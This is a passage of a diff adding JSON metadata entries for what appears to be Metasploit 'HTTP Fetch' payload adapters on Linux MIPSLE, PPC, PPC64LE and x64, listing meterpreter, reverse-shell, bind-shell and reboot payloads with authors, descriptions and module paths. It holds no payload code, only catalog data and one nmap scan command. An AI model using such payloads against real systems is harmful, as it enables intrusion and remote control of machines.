"Fetch and execute an MIPSLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsle/reboot": { + "name": "HTTP Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/http/mipsle/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/reboot", + "staged": false + }, + "payload_cmd/linux/http/mipsle/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/mipsle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/shell", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/http/mipsle/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/mipsle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsle/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/mipsle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/ppc/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:49 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/ppc/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:49 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/ppc/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:49 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/ppc64/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/ppc64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:57 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64", + "adapted_refname": "linux/ppc64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/ppc64/shell_find_port": { + "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/http/ppc64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:57 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64", + "adapted_refname": "linux/ppc64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/http/ppc64/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/ppc64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:51:57 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64", + "adapted_refname": "linux/ppc64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/ppc64le/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/ppc64le/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/ppc64le/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/exec", + "staged": false + }, + "payload_cmd/linux/http/x64/meterpreter/bind_tcp": { + "name": "HTTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/http/x64/meterpreter/reverse_sctp": { + "name": "HTTP Fetch, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/http/x64/meterpreter/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/http/x64/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/http/x64/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/x64/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/x64/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/pingback_bind_tcp": { + "name": "HTTP Fetch, Linux x64 Pingback, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/x64/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nAccept a connection from attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/pingback_reverse_tcp": { + "name": "HTTP Fetch, Linux x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/shell/bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/http/x64/shell/reverse_sctp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/http/x64/shell/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/http/x64/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/http/x64/shell_bind_ipv6_tcp": { + "name": "HTTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/http/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_bind_tcp_random_port": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/http/x64/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_find_port": { + "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/http/x64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "mak" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_find_port", + "check": false, + 